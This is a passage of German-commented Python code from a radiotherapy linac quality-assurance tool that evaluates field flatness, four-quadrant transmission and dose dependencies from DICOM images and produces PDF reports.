self.checkField = checkField
self.baseField = baseField
if self.checkField and self.baseField:
# checkField und baseField wurden angegeben, normalize möglich
# self.image und self.baseImage initialisieren und ggf normalisieren
ispCheckClass.__init__( self,
image=FSImage( self.checkField ),
baseImage=FSImage( self.baseField ),
normalize=normalize
)
elif self.checkField:
# nur checkfield wurde angegeben
# self.image initialisieren
ispCheckClass.__init__( self,
image=FSImage( self.checkField )
)
def getProfileData( self ):
"""Profildaten aus image holen flatness='iec' symmetry='pdq iec'
DONE: flatness selbst berechnen - flatness = (dmax-dmin) / np.mean(m)
"""
def flatness_calculation(profile):
"""IEC specification for calculating flatness
            the CAX value is taken as the mean of 5 neighbouring samples
"""
cax_idx = profile.fwxm_center()
# cax von 5 benachbarten Werten bilden
cax5 = np.mean( profile[cax_idx-2:cax_idx+3] )
#print( cax, profile, cax5 )
dmax = profile.field_calculation(field_width=0.8, calculation='max')
dmin = profile.field_calculation(field_width=0.8, calculation='min')
flatness = (dmax - dmin) / cax5 * 100
lt_edge, rt_edge = profile.field_edges()
return flatness, dmax, dmin, lt_edge, rt_edge
from pylinac.core.profile import SingleProfile
vert_position = 0.5
horiz_position = 0.5
vert_profile = SingleProfile(self.image.array[:, int(round(self.image.array.shape[1] * vert_position))])
horiz_profile = SingleProfile(self.image.array[int(round(self.image.array.shape[0] * horiz_position)), :])
vert_flatness, vert_max, vert_min, vert_lt, vert_rt = flatness_calculation(vert_profile)
horiz_flatness, horiz_max, horiz_min, horiz_lt, horiz_rt = flatness_calculation(horiz_profile)
flatness = {
'method': "IEC",
'horizontal': {
'value': horiz_flatness, 'profile': horiz_profile, 'profile max': horiz_max, 'profile min': horiz_min, 'profile left': horiz_lt, 'profile right': horiz_rt,
},
'vertical': {
'value': vert_flatness, 'profile': vert_profile, 'profile max': vert_max, 'profile min': vert_min, 'profile left': vert_lt, 'profile right': vert_rt,
},
}
return {
'filename': self.infos["filename"],
'Kennung': self.infos["Kennung"],
'type': self.infos['testTags'],
'unit': self.infos['unit'],
'energy': self.infos['energy'],
'gantry' : self.infos['gantry'],
'collimator': self.infos['collimator'],
'flatness': flatness
}
def plotProfile(self, data, metadata={} ):
"""Ein horizontale und vertikale Profilachse plotten
Parameters
----------
data : dict
metadata : dict
profileSize
profileTitle - format Ersetzungen aus self.infos sind möglich
"""
# plotbereiche festlegen und profileSize als imgSize übergeben
fig, ax = self.initPlot( imgSize=metadata["profileSize"], nrows=2 )
# axes coordinates are 0,0 is bottom left and 1,1 is upper right
# Kurven Informationen
if not "profileTitle" in metadata:
metadata["profileTitle"] = "{Kennung} - Energie:{energy} Gantry:{gantry:.1f} Kolli:{collimator:.1f}"
ax[0].set_title( metadata["profileTitle"].format( **self.infos ) )
#x= np.divide(data["horizontal"]['profile'].values, self.image.dpmm + self.image.cax.x)
#ax[0].get_xaxis().set_ticks( np.arange( self.mm2dots_X(-200), self.mm2dots_X(200), self.mm2dots_X(50) ) )
#ax[0].get_xaxis().set_ticklabels([-200,0,200])
#ax[0].set_xlim([ self.mm2dots_X(-210), self.mm2dots_X(210) ])
#ax[0].set_title( 'horizontal' )
# 2. Kurve horizontal
# x-Achse
ax[0].get_xaxis().set_ticklabels([])
ax[0].get_xaxis().set_ticks( [] )
# y-achse
ax[0].get_yaxis().set_ticklabels([])
ax[0].get_yaxis().set_ticks( [] )
# kurve plotten
ax[0].plot(data["horizontal"]['profile'].values , color='b')
# links rechts min max
ax[0].axhline(data["horizontal"]['profile max'], color='g', linewidth=1 )
ax[0].axhline(data["horizontal"]['profile min'], color='g', linewidth=1 )
ax[0].axvline(data["horizontal"]['profile left'], color='g', linewidth=1, linestyle='-.')
ax[0].axvline(data["horizontal"]['profile right'], color='g', linewidth=1, linestyle='-.')
cax_idx = data["horizontal"]['profile'].fwxm_center()
ax[0].axvline(cax_idx, color='g', linewidth=1, linestyle='-.')
# limits nach dem autom. setzen der Kurve
xlim = ax[0].get_xlim()
width = xlim[1] + xlim[0]
ylim = ax[0].get_ylim()
height = ylim[1] + ylim[0]
ax[0].text(
width / 2, height / 10,
#self.image.mm2dots_X(0), # x-Koordinate: 0 ganz links, 1 ganz rechts
#self.image.mm2dots_Y(500), # y-Koordinate: 0 ganz oben, 1 ganz unten
'crossline', # der Text der ausgegeben wird
ha='center', # horizontalalignment
va='center', # verticalalignment
fontsize=20, # 'font' ist äquivalent
alpha=.5 # Floatzahl von 0.0 transparent bis 1.0 opak
)
#ax[0].text(2.5, 2.5, 'horizontal', ha='center', va='center', size=20, alpha=.5)
#ax[0].set_title('Horizontal')
# 2. Kurve vertikal
# label und Ticks abschalten
# x-Achse
ax[1].get_xaxis().set_ticklabels([])
ax[1].get_xaxis().set_ticks( [] )
# y-achse
ax[1].get_yaxis().set_ticklabels([])
ax[1].get_yaxis().set_ticks( [] )
# Kurve plotten
ax[1].plot(data["vertical"]['profile'].values, color='r')
# links rechts min max
ax[1].axhline(data["vertical"]['profile max'], color='g', linewidth=1)
ax[1].axhline(data["vertical"]['profile min'], color='g', linewidth=1)
ax[1].axvline(data["vertical"]['profile left'], color='g', linewidth=1, linestyle='-.')
ax[1].axvline(data["vertical"]['profile right'], color='g', linewidth=1, linestyle='-.')
cax_idx = data["vertical"]['profile'].fwxm_center()
ax[1].axvline(cax_idx, color='g', linewidth=1, linestyle='-.')
#ax[1].set_title('Vertikal')
# limits nach dem autom. setzen der Kurve
xlim = ax[0].get_xlim()
width = xlim[1] + xlim[0]
ylim = ax[0].get_ylim()
height = ylim[1] + ylim[0]
ax[1].text(
width / 2, height / 10,
#self.image.mm2dots_X(0),
#self.image.mm2dots_Y(500),
'inline',
ha='center',
va='center',
size=20,
alpha=.5
)
import matplotlib.pyplot as plt
# Layout optimieren
plt.tight_layout(pad=0.4, w_pad=1.0, h_pad=1.0)
# data der Grafik zurückgeben
return self.getPlot()
def find4Qdata( self, field=None ):
""" Die transmissions eines 4 Quadranten Feldes im angegebenem Bereich ermitteln
Reihenfolge in result 'Q2Q1','Q2Q3','Q3Q4','Q1Q4'
[start:stop:step, start:stop:step ]
roi = np.array([
[11, 12, 13, 14, 15],
[21, 22, 23, 24, 25],
[31, 32, 33, 34, 35],
[41, 42, 43, 44, 45],
[51, 52, 53, 54, 55]])
print( roi[ : , 0:1 ] )
[[11] [21] [31] [41] [51]] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ 0 ] )
[11 12 13 14 15] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ 0:1, ] )
[[11 12 13 14 15]] - ( 5 Line2D nicht gezeichnet)
print( roi[ 0:1, ][0] )
[11 12 13 14 15] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ :, -1: ] )
[[15] [25] [35] [45] [55]] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ -1 ] )
[51 52 53 54 55] - ( 1 Line2D gezeichnet LU-RO)
print( roi[ -1:, : ][0] )
[51 52 53 54 55] - ( 1 Line2D gezeichnet LU-RO)
# richtungsumkehr
print( roi[ ::-1, -1: ] )
[[55] [45] [35] [25] [15]] - ( 1 Line2D gezeichnet LO-RU)
"""
if not field:
field = { "X1":-50, "X2": 50, "Y1": -50, "Y2": 50 }
roi = self.image.getRoi( field ).copy()
result = {}
result['Q2Q1'] = {
'name' : 'Q2 - Q1',
'profile' : MultiProfile( roi[:, 0:1] ),
'field' : field
}
result['Q2Q3'] = {
'name' : 'Q2 - Q3',
'profile' : MultiProfile( roi[ 0:1, ][0] ),
'field' : field
}
result['Q3Q4'] = {
'name' : 'Q3 - Q4',
'profile' : MultiProfile( roi[ :, -1: ] ),
'field' : field
}
result['Q1Q4'] = {
'name' : 'Q1 - Q4',
'profile' : MultiProfile( roi[ -1:, : ][0] ),
'field' : field
}
#print( result )
for k in result:
#print(k)
p_min = np.min( result[k]["profile"] )
p_max = np.max( result[k]["profile"] )
result[k]["min"] = p_min
result[k]["max"] = p_max
result[k]["value"] = (lambda x: p_min if x < 0.9 else p_max )(p_min)
return {
'filename': self.infos["filename"],
'Kennung': self.infos["Kennung"],
'type': self.infos['testTags'],
'unit': self.infos['unit'],
'energy': self.infos['energy'],
'gantry' : self.infos['gantry'],
'collimator': self.infos['collimator'],
'field' : field,
'result' : result
}
def plot4Qprofile( self, data , metadata={} ):
""" Ein angegebenes 4Q Profil plotten
Parameters
----------
data : dict
"""
# plotbereiche festlegen
fig, ax = self.initPlot( metadata["profileSize"] )
#print("plot4Qprofile", data)
ax.set_title(data["name"])
# kurve plotten
ax.plot(data["profile"].values, color='b')
# y Achsenlimit
ax.set_ylim(0.5, 1.5)
# x-Achse
ax.get_xaxis().set_ticklabels([ data["name"][0:2], data["name"][-2:] ])
ax.get_xaxis().set_ticks( [0, len(data["profile"].values) ] )
# y-achse anzeigen
ax.get_yaxis().set_ticklabels( [0.75, 1, 1.25] )
ax.get_yaxis().set_ticks( [0.75, 1, 1.25] )
# grid anzeigen
ax.grid( True )
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
# data der Grafik zurückgeben
return self.getPlot()
class checkField( ispBase ):
def _doField_one2n(self, fileData, md={}, passedOn=True, withOffsets=False):
"""
TODO: query aus tolerance?
openFieldQuery = md.current.tolerance.default.check.query
fieldQuery = openFieldQuery.replace("==", "!=")
Parameters
----------
fileData : TYPE
DESCRIPTION.
overrideMD : TYPE, optional
DESCRIPTION. The default is {}.
passedOn : TYPE, optional
DESCRIPTION. The default is True.
withOffsets : TYPE, optional
DESCRIPTION. The default is False.
Returns
-------
TYPE
DESCRIPTION.
result : TYPE
DESCRIPTION.
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( md ), self.metadata )
#md.pprint(pformat='json')
def evaluate( df_group ):
"""Evaluate grouped Fields.
create PDF output and fills result
Parameters
----------
df_group : pandas Dataframe
"""
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
baseMeanDose = baseField.getMeanDose( md["doseArea"] )
#
evaluation_table = [ {
'Kennung': baseField.infos["RadiationId"],
'doserate': baseField.infos["doserate"],
'ME': baseField.infos["ME"],
'baseME': baseField.infos["ME"],
'baseMeanDose': 1,
'fieldMeanDose': baseMeanDose
}]
# print BaseField Image
img = baseField.image.plotImage( **md.plotImage )
self.pdf.image(img, **md.plotImage_pdf )
# alle anderen durchgehen
for info in df_fields.itertuples():
# prüf Field und dosis bereitstellen
checkField = qa_field( self.getFullData(info), normalize="none" )
fieldMeanDose = checkField.getMeanDose( md["doseArea"] )
#
evaluation_table.append( {
'Kennung': checkField.infos["Kennung"],
'doserate': checkField.infos["doserate"],
'ME': checkField.infos["ME"],
'baseME': baseField.infos["ME"],
'baseMeanDose': baseMeanDose,
'fieldMeanDose': fieldMeanDose
} )
if md["print_all_images"] == True:
# print checkField Image
img = checkField.image.plotImage( **md.plotImage )
self.pdf.image(img, **md.plotImage_pdf )
# progress
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
evaluation_df = pd.DataFrame( evaluation_table )
# check tolerance - printout tolerance, evaluation_df and result icon
acceptance = self.evaluationResult( evaluation_df, md, result, md["tolerance_field"] )
#
# call evaluate with sorted and grouped fields
fileData.sort_values(md["series_sort_values"]).groupby( md["series_groupby"] ).apply( evaluate )
#print("one2n", result)
return self.pdf.finish(), result
def doJT_end2end( self, filedata ):
"""
.. note:: Test noch nicht erstellt
"""
pass
def doMT_4_1_2(self, fileData):
"""Monatstest: 4.1.2. ()
- Gruppiert nach Doserate, sortiert nach MU
-
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# place for testing parameters
md = dict_merge( DotMap( {
} ), self.metadata )
#md.pprint(pformat='json')
def groupBySeries( df_group ):
"""Datumsweise Auswertung und PDF Ausgabe
Die Daten kommen nach doserate und ME sortiert
"""
#print("doMT_7_2", df_group[ ["energy", "doserate", "ME"] ] )
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
result_doserate = []
def groupByDoserate( df_doserate ):
text = ""
# in den Toleranzangaben der config steht die default query
openFieldQuery = md.current.tolerance.default.check.query
fieldQuery = openFieldQuery.replace("==", "!=")
#print( openFieldQuery, fieldQuery )
# das offene Feld bestimmen
df_base = df_doserate.query( openFieldQuery )
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ), normalize="none" )
baseMeanDose = baseField.getMeanDose( md["doseArea"] )
# 100 referenz Dose 1.0
data = [ {
'Kennung': baseField.infos["RadiationId"],
'doserate': baseField.infos["doserate"],
'ME': baseField.infos["ME"],
# 'baseMeanDose': baseMeanDose,
'fieldMeanDose': baseMeanDose,
'diff': (baseMeanDose - 1.0) * 100
}]
# alle anderen filtern
df_fields = df_doserate.query( fieldQuery )
# alle anderen durchgehen
for info in df_fields.itertuples():
# prüft Field und dosis bereitstellen
checkField = qa_field( self.getFullData(info), normalize="none" )
# Berechnung der mittleren Felddosis
fieldMeanDose = checkField.getMeanDose( md["doseArea"] )
# Berechnung
baseFmu = baseMeanDose / baseField.infos['ME'] * checkField.infos['ME']
data.append( {
'Kennung': checkField.infos["RadiationId"],
'doserate': checkField.infos["doserate"],
'ME': checkField.infos["ME"],
'fieldMeanDose': fieldMeanDose,
'diff': (fieldMeanDose - baseFmu) / baseFmu * 100,
} )
# progress
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# aus den daten ein DataFrame machen
evaluation_df = pd.DataFrame( data )
# check tolerance - printout tolerance, evaluation_df - md["tolerance_field"],
acceptance = self.evaluationResult( evaluation_df, md, result_doserate, printResultIcon=False )
# acceptance dieser Gruppe zurückgeben
return acceptance
#
# Gruppiert nach doserate abarbeiten und min zurückgeben
#
acceptance = df_group.groupby( [ "doserate" ] ).apply( groupByDoserate ).min()
#
# Ergebnis in result merken
#
result.append( self.createResult( result_doserate, md, [],
df_group['AcquisitionDateTime'].iloc[0].strftime("%Y%m%d"),
len( result ), # bisherige Ergebnisse in result
acceptance
) )
# Gesamt check - das schlechteste von result_doserate
self.pdf.resultIcon( acceptance )
#
# Gruppiert nach SeriesNumber abarbeiten
fileData.sort_values( md["series_sort_values"] ).groupby( md["series_groupby"] ).apply( groupBySeries )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doJT_7_2(self, fileData):
"""Jahrestest: 7.2. ()
Abhängigkeit der Kalibrierfaktoren von der Monitorrate
"""
# place for testing parameters
md = dict_merge( DotMap( {
} ), self.metadata )
return self._doField_one2n(fileData, md=md )
def doJT_7_3(self, fileData):
"""Jahrestest: 7.3. ()
Abhängigkeit der Kalibrierfaktoren vom Dosismonitorwert
"""
# place for testing parameters
md = dict_merge( DotMap( {
} ), self.metadata )
return self._doField_one2n(fileData, md=md )
def doJT_7_4(self, fileData):
"""Jahrestest: 7.4. ()
        Abhängigkeit der Kalibrierfaktoren vom Tragarm-Rotationswinkel
10x10 Feld unter 0° mit Aufnahmen unter 90, 180, 270 vergleichen
Auswertung in einer ROI von 10mmx10mm
Energie: alle
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"series_sort_values": ["gantry", "collimator"],
"series_groupby": ["day", "SeriesNumber"],
"querys" : {
"base" : "gantry == 0 & collimator == 0",
"fields" : "gantry != 0 | collimator != 0",
},
# "field_count": 3,
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width"},
},
"tolerance_pdf" : {
"attrs": {"margin-top":"-2mm"},
"mode": "text"
},
"doseArea" : { "X1":-5, "X2": 5, "Y1": -5, "Y2": 5 },
"_imgSize" : { "width" : 80, "height" : 80},
"plotImage_field" : 10,
"evaluation_table_pdf" : {
"attrs": { "class":"layout-fill-width", "margin-top": "5mm" },
"fields": [
{'field': 'Kennung', 'label':'Kennung', 'format':'{0}', 'style': [('text-align', 'left')] },
{'field': 'gantry', 'label':'Gantry', 'format':'{0:1.1f}' },
{'field': 'collimator','label':'Kollimator', 'format':'{0:1.1f}' },
{'field': 'baseMeanDose', 'label':'Dosis', 'format':'{0:.5f}' },
{'field': 'fieldMeanDose', 'label':'Prüf Dosis', 'format':'{0:.5f}' },
{'field': 'diff', 'label':'Abweichung [%]', 'format':'{0:.2f}' },
{'field': 'diff_passed', 'label':'Passed' }
],
},
"table_sort_values_by": ["doserate"],
"table_sort_values_ascending": [True],
} ), self.metadata )
def evaluate( df_group ):
"""Evaluate grouped Fields
create PDF output and fills result
Parameters
----------
df_group : pandas Dataframe
"""
# get base and fields, check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
baseMeanDose = baseField.getMeanDose( md["doseArea"] )
data = [{
'Kennung': baseField.infos["Kennung"],
'gantry': baseField.infos["gantry"],
'collimator': baseField.infos["collimator"],
'baseMeanDose': baseMeanDose,
'fieldMeanDose': np.nan,
'diff': np.nan,
}]
# Bild anzeigen
img = baseField.image.plotImage( original=False
, plotTitle="{Kennung} - G:{gantry:01.1f} K:{collimator:01.1f}"
, field=md["plotImage_field"]
, invert=False # , cmap="jet"
, plotCax=True, plotField=True
)
self.pdf.image(img, md["_imgSize"], attrs={"margin-left":"5mm"} )
# alle anderen durchgehen
for info in df_fields.itertuples():
# prüf Field und dosis bereitstellen
checkField = qa_field( self.getFullData(info), normalize="none" )
fieldDose = checkField.getMeanDose( md["doseArea"] )
#
data.append( {
'Kennung': checkField.infos["Kennung"],
'gantry': checkField.infos["gantry"],
'collimator': checkField.infos["collimator"],
'baseMeanDose': np.nan,
'fieldMeanDose': fieldDose,
'diff': (fieldDose-baseMeanDose) / baseMeanDose * 100,
} )
# Bild anzeigen
img = checkField.image.plotImage( original=False
, plotTitle="{Kennung} - G:{gantry:01.1f} K:{collimator:01.1f}"
, field=md["plotImage_field"]
, invert=False # , cmap="jet"
, plotCax=True, plotField=True
)
self.pdf.image(img, md["_imgSize"], attrs={"margin-left":"5mm"} )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
evaluation_df = pd.DataFrame( data )
# check tolerance - printout tolerance, evaluation_df and result icon
acceptance = self.evaluationResult( evaluation_df, md, result, 'diff' )
#
# call evaluate with sorted and grouped fields
fileData.sort_values(md["series_sort_values"]).groupby( md["series_groupby"] ).apply( evaluate )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doJT_7_5(self, fileData):
"""Jahrestest: 7.5. ()
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"series_sort_values": ["gantry", "StopAngle"],
"series_groupby": ["day"],
"sub_series_groupby": ["energy"],
"querys" : {
"base" : "GantryRtnDirection == 'NONE'",
"fields" : "GantryRtnDirection != 'NONE'",
"sub_base" : "GantryRtnDirection == 'NONE'",
"sub_fields" : "GantryRtnDirection != 'NONE'",
},
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width", "margin-bottom": "5mm"},
},
"doseArea" : { "X1":-5, "X2": 5, "Y1": -5, "Y2": 5 },
"plotImage": {
"original": False,
"plotTitle": "{Kennung} - G:{von_nach}",
"field": 10,
"invert": True,
"cmap": "gray_r", # gray_r twilight jet
"plotCax": True,
"plotField": True
},
"plotImage_pdf": {
"area" : { "width" : 90, "height" : 90 },
#"attrs": "",
},
"evaluation_table_pdf" : {
"attrs": { "class":"layout-fill-width", "margin-top": "5mm" },
"fields": [
{'field': 'Kennung', 'label':'Kennung', 'format':'{0}', 'style': [('text-align', 'left')] },
# {'field': 'ME', 'label':'MU' },
{'field': 'von_nach', 'label':'Gantry' },
{'field': 'baseMeanDose', 'label':'Dosis', 'format':'{0:.5f}' },
{'field': 'fieldMeanDose', 'label':'Prüf Dosis', 'format':'{0:.5f}' },
{'field': 'diff', 'label':'Abweichung [%]', 'format':'{0:.2f}' },
{'field': 'diff_passed', 'label':'Passed' }
],
},
"table_sort_values_by": ["ME"],
"table_sort_values_ascending": [True],
} ), self.metadata )
# alte Auswertung
pre2020 = False
if md.get("AcquisitionYear", 0) < 2020:
md.evaluation_text = ""
md.tolerance_pdf.mode = "text"
pre2020 = True
#md.pprint(pformat='json')
def evaluate( df_group ):
"""Evaluate grouped Fields
create PDF output and fills result
Parameters
----------
df_group : pandas Dataframe
felder unter 0° sind basis für die winkel felder
Auswertung je doserate
"""
# get base and fields, check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
data = []
# gruppiert nach gantry und kollimator
def sub_evaluate( df ):
# get base and fields, check number of data
# print("doJT_7_5", df[ [ "RadiationId", "gantry", "StopAngle", "collimator", "ME", "doserate", "check_subtag" ] ])
df_base = df.query( md.querys[ "sub_base"] )
df_fields = df.query( md.querys[ "sub_fields"] )
# base Field und dosis bereitstellen
baseField = qa_field( self.getFullData( df_base.loc[df_base.index[0]] ) )
baseMeanDose = baseField.getMeanDose( md["doseArea"] )
# zusätzliche Spalte in fields anlegen
df_fields["von_nach"] = df_group[['gantry','StopAngle']].apply(lambda x : '{:.1f} -> {:.1f}'.format(x[0],x[1]), axis=1)
if pre2020 == True:
data.append({
'Kennung': baseField.infos["Kennung"],
'von_nach': "{:01.1f}".format( baseField.infos["gantry"] ),
'ME': baseField.infos["ME"],
'baseMeanDose': baseMeanDose,
'fieldMeanDose': np.nan,
'diff': np.nan,
})
# alle Felder durchgehen
for info in df_fields.itertuples():
# prüf Field und dosis bereitstellen
checkField = qa_field( self.getFullData(info), normalize="none" )
fieldDose = checkField.getMeanDose( md["doseArea"] )
#
if pre2020 == True:
data.append({
'Kennung': checkField.infos["Kennung"],
'von_nach': checkField.infos["von_nach"],
'ME': checkField.infos["ME"],
'baseMeanDose': np.nan,
'fieldMeanDose': fieldDose,
'diff': (fieldDose-baseMeanDose) / baseMeanDose * 100,
})
else:
data.append({
'Kennung': checkField.infos["Kennung"],
'von_nach': checkField.infos["von_nach"],
'ME': checkField.infos["ME"],
'baseMeanDose': baseMeanDose,
'fieldMeanDose': fieldDose,
})
# Bild anzeigen
img = checkField.image.plotImage( **md["plotImage"] )
self.pdf.image(img, **md["plotImage_pdf"] )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# sub evaluate
#
df_group.groupby( md["sub_series_groupby"] ).apply( sub_evaluate )
evaluation_df = pd.DataFrame( data )
# check tolerance - printout tolerance, evaluation_df and result icon
acceptance = self.evaluationResult( evaluation_df, md, result, 'diff' )
# call evaluate with sorted and grouped fields
fileData.sort_values(md["series_sort_values"]).groupby( md["series_groupby"] ).apply( evaluate )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doJT_9_1_2(self, fileData):
"""Jahrestest: 9.1.2. ()
Abhängigkeit der Variation des Dosisquerprofils vom Tragarm-Rotationswinkel
DIN 6847-5:2013; DIN EN 60976: 2011-02
30x30 Feld bei im Bereich 80% der Feldbreite max-min/Wert im Zentralstrahl Bereich von 2mm"
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"series_sort_values": ["gantry"],
"series_groupby": ["day"],
"querys" : {
"fields" : "check_subtag != 'base'",
# "field_count": self.metadata.current.get("fields", 0), # 4
},
"manual": {
"filename": self.metadata.info["anleitung"],
"attrs": {"class":"layout-fill-width", "margin-bottom": "5mm"},
},
"_clip" : { "width":"50mm", "height":"45mm" },
"_formel": { "margin-top":"15mm", "width":"21mm", "height":"11mm"},
"_table": { "width":105, "height": 45, "left":75, "top":215 },
"_chart" : {"width" : 90, "height" : 70},
"profileSize" : { "width" : 90, "height" : 70 },
"profileTitle" : "Gantry: {gantry}°",
"table_fields" : [
{'field': 'gantry', 'label':'Gantry', 'format':'{0:.1f}' },
{'field': 'crossline', 'label':'crossline [%]', 'format':'{0:.1f}' },
# {'field': 'crossline_soll', 'label':'c-soll [%]', 'format':'{0:.1f}' },
{'field': 'c_soll', 'label':'c-soll [%]', 'format':'{0:.1f}' },
{'field': 'crossline_acceptance', 'label':'c-abw.[%]', 'format':'{0:.3f}' },
{'field': 'inline', 'label':'inline [%]', 'format':'{0:.1f}' },
# {'field': 'inline_soll', 'label':'i-soll [%]', 'format':'{0:.1f}' },
{'field': 'i_soll', 'label':'i-soll [%]', 'format':'{0:.1f}' },
{'field': 'inline_acceptance', 'label':'i-abw.[%]', 'format':'{0:.3f}' },
# {'field': 'i_diff', 'label':'i-abw.[%]', 'format':'{0:.3f}' }
]
} ), self.metadata )
# tolerance Werte bereitstellen
#toleranz = {}
#if "toleranz" in md["testConfig"] and md["energy"] in md["testConfig"]["toleranz"]:
# toleranz = md["testConfig"]["toleranz"][ md["energy"] ]
def evaluate( df_group ):
"""Datumsweise Auswertung
"""
# get base and fields check number of data
ok, df_base, df_fields = self.evaluationPrepare(df_group, md, result)
if not ok:
return
data = []
# alle Felder durchgehen
for info in df_group.itertuples():
checkField = qa_field( self.getFullData( info ), normalize="none" )
# Analyse nach DIN (max-min)/center rückgabe in valueiec
profile = checkField.getProfileData()
# crossplane und inplane
c = profile["flatness"]["horizontal"]
i = profile["flatness"]["vertical"]
# key für tolerance
#sollKeyC = "{gantry:1.0f}-cl".format( **checkField.infos )
#sollKeyI = "{gantry:1.0f}-il".format( **checkField.infos )
#sollKey = "{gantry:1.0f}-cl".format( **checkField.infos )
# Bild anzeigen
img = checkField.plotProfile( profile["flatness"], metadata=md )
self.pdf.image(img, md["_chart"], {"padding":"2mm 0 2mm 0"} )
data.append( {
'gantry' : checkField.infos["gantry"],
'crossline': c["value"],
'c_soll' : 5,
#'c_soll' : toleranz.get( sollKeyC, np.nan ),
'inline': i["value"],
'i_soll' : 5,
#'i_soll' : toleranz.get( sollKeyI, np.nan ),
} )
# progress pro file stimmt nicht immer genau (baseimage)
# 40% für die dicom daten 40% für die Auswertung 20 % für das pdf
self.fileCount += 1
if hasattr( logger, "progress"):
logger.progress( md["testId"], 40 + ( 40 / filesMax * self.fileCount ) )
# Grafik und Formel anzeigen
self.pdf.image( "qa/Profile.svg", attrs=md["_clip"])
self.pdf.mathtext( r"$\frac{D_{max} - D_{min}} {D_{CAX}}$", attrs=md["_formel"] )
# dataframe erstellen
df = pd.DataFrame( data )
# berechnete Splaten einfügen
#df['c_diff'] = (df.crossline - df.c_soll ) / df.c_soll * 100
#df['i_diff'] = (df.inline - df.i_soll ) / df.i_soll * 100
#
# Abweichung ausrechnen und Passed setzen
#
check = [
{ "field": 'crossline', 'tolerance':'default' },
{ "field": 'inline', 'tolerance':'default' }
]
acceptance = self.check_acceptance( df, md, check, withSoll=True )
#print( df.columns )
# 'gantry', 'crossline', 'inline', 'crossline_soll',
# 'crossline_acceptance', 'crossline_passed', 'inline_soll',
# 'inline_acceptance', 'inline_passed'
#
# Ergebnis in result merken
#
result.append( self.createResult( df, md, check,
df_group['AcquisitionDateTime'].iloc[0].strftime("%Y%m%d"),
len( result ), # bisherige Ergebnisse in result
acceptance
) )
#
# Tabelle erzeugen
#
self.pdf.pandas( df,
area=md["_table"],
attrs={"class":"layout-fill-width", "margin-top": "5mm"},
fields=md["table_fields"]
)
# Gesamt check - das schlechteste aus der tabelle
self.pdf.resultIcon( acceptance )
#
# call evaluate with sorted and grouped fields
fileData.sort_values(md["series_sort_values"]).groupby( md["series_groupby"] ).apply( evaluate )
# fileData.sort_values(["gantry"]).groupby( [ 'day' ] ).apply( groupBySeries )
# abschließen pdfdaten und result zurückgeben
return self.pdf.finish(), result
def doJT_10_3(self, fileData ):
"""Jahrestest: 10.3. ( Vierquadrantentest)
Das zusammengesetzte Feld mit dem Full Feld vergleichen
5cm Profil über die Mitte je zwei zusammengesetzter Bereiche
davon min/mean max/mean wobei Mean des gleichen Profils aus dem Full Feld kommt
In den Übergängen ca 70% des vollen Feldes
Parameters
----------
fileData : pandas.DataFrame
Returns
-------
pdfFilename : str
Name der erzeugten Pdfdatei
result : list
list mit dicts der Testergebnisse
See Also
--------
isp.results : Aufbau von result
"""
# used on progress
filesMax=len( fileData )
self.fileCount = 0
# holds evaluation results
result=[]
# prepare metadata
md = dict_merge( DotMap( {
"series_sort_values" : ['check_subtag'],
"series_groupby": ["day", "SeriesNumber"],
"querys" : {
"base": "check_subtag.isnull()",
"fields": "check_subtag.notnull()",
"engine": "python"
# "field_count": self.metadata.current.get("fields", 0), # 5
},
